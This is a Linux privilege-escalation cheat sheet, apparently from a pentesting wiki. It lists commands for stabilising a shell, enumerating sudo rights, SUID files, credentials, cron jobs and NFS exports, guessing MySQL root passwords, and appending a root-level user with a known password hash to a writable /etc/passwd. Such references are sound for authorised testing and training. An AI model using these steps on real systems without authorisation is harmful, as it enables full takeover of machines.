Privilege Escalation

Based on g0tmilk’s Guide to Linux Privilege Escalation + additional field notes.

Step 1: Upgrade Your Shell

Make your shell more stable & interactive:

python -c 'import pty; pty.spawn("/bin/bash")'
python3 -c 'import pty; pty.spawn("/bin/bash")'
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/tmp
export TERM=xterm-256color
alias ll='ls -lsaht --color=auto'

# Background and fix terminal
Ctrl + Z
stty raw -echo; fg; reset
stty columns 200 rows 200

Step 2: Enumeration – System Context

Capabilities & Tooling

which gcc
which cc
which python
which perl
which wget
which curl
which fetch
which nc
which ncat
which nc.traditional
which socat

Compilation / System Info

file /bin/bash
uname -a
cat /etc/*-release
cat /etc/issue

Arch & Kernel

file /bin/bash
uname -a

Step 3: User Context

Are we a real user?

sudo -l
ls -lsaht /etc/sudoers
groups <user>
env

Users & homes:

cd /home/ && ls -lsaht

Step 4: Credentials & Configs

Check for web creds:

cd /var/www/html/ && ls -lsaht

Check /etc/ for unusual configs:

ls -lsaht /etc/
ls -lsaht /etc/ | grep -i '\.conf'
ls -lsaht /etc/ | grep -i '\.secret'

SSH keys:

ls -lsaR /home/

Other dirs of interest:

ls -lsaht /var/lib/
ls -lsaht /var/db/
ls -lsaht /opt/
ls -lsaht /tmp/
ls -lsaht /var/tmp/
ls -lsaht /dev/shm/

Step 5: Escalation Primitives

SUID / GUID

find / -perm -u=s -type f 2>/dev/null
find / -perm -g=s -type f 2>/dev/null

Check exploitation paths: GTFOBins

File Capabilities

getcap -r / 2>/dev/null

Reference: Linux File Capabilities

Step 6: Process & Cron Monitoring

Running Processes

ps aux | grep -i root --color=auto

Network

netstat -antup
netstat -tunlp

Cron Jobs

crontab -u root -l
cat /etc/crontab
ls /etc/cron.*

Process Monitoring (pspy)

# On attacker machine:
cd /var/tmp/
# Transfer pspy
chmod 755 pspy64
./pspy64

pspy

Step 7: Databases

Check for MySQL root creds:

mysql -uroot -p
# Try common passwords:
# root, toor, (empty)

Step 8: File Transfers

Check what’s available:

which wget
which curl
which nc
which fetch
ls -lsaht /bin/ | grep -i 'ftp'

Step 9: NFS

Check for exports:

cat /etc/exports

👉 Look for no_root_squash → Attacking NFS Shares

Step 10: Persistence / Living on Host

Writable locations:

/var/tmp/
/tmp/
/dev/shm/

Check mounts:

cat /etc/fstab

Step 11: Local Port Forwards

If vulnerable services are only on 127.0.0.1:

Use meterpreter port forwarding.
Metasploit Portfwd

Step 12: Direct Root via `/etc/passwd`

If writable:

openssl passwd -1 i<3hacking
# Example output: $1$/UTMXpPC$Wrv6PM4eRHhB1/m1P.t9l.
echo 'siren:$1$/UTMXpPC$Wrv6PM4eRHhB1/m1P.t9l.:0:0:siren:/home/siren:/bin/bash' >> /etc/passwd
su siren
id

Step 13: Miscellaneous

Mail:

cd /var/mail/
cd /var/spool/mail/
ls -lsaht

Files by specific user (ex: bob):
```
find / -user bob 2>/dev/null
```

Tools

PreviousPivoting NextTheory

Last updated 5 months ago

hashtagStep 1: Upgrade Your Shell

hashtagStep 2: Enumeration – System Context

hashtagCapabilities & Tooling

hashtagCompilation / System Info

hashtagArch & Kernel

hashtagStep 3: User Context

hashtagStep 4: Credentials & Configs

hashtagStep 5: Escalation Primitives

hashtagSUID / GUID

hashtagFile Capabilities

hashtagStep 6: Process & Cron Monitoring

hashtagRunning Processes

hashtagNetwork

hashtagCron Jobs

hashtagProcess Monitoring (pspy)

hashtagStep 7: Databases

hashtagStep 8: File Transfers

hashtagStep 9: NFS

hashtagStep 10: Persistence / Living on Host

hashtagStep 11: Local Port Forwards

hashtagStep 12: Direct Root via /etc/passwd

hashtagStep 13: Miscellaneous

hashtagTools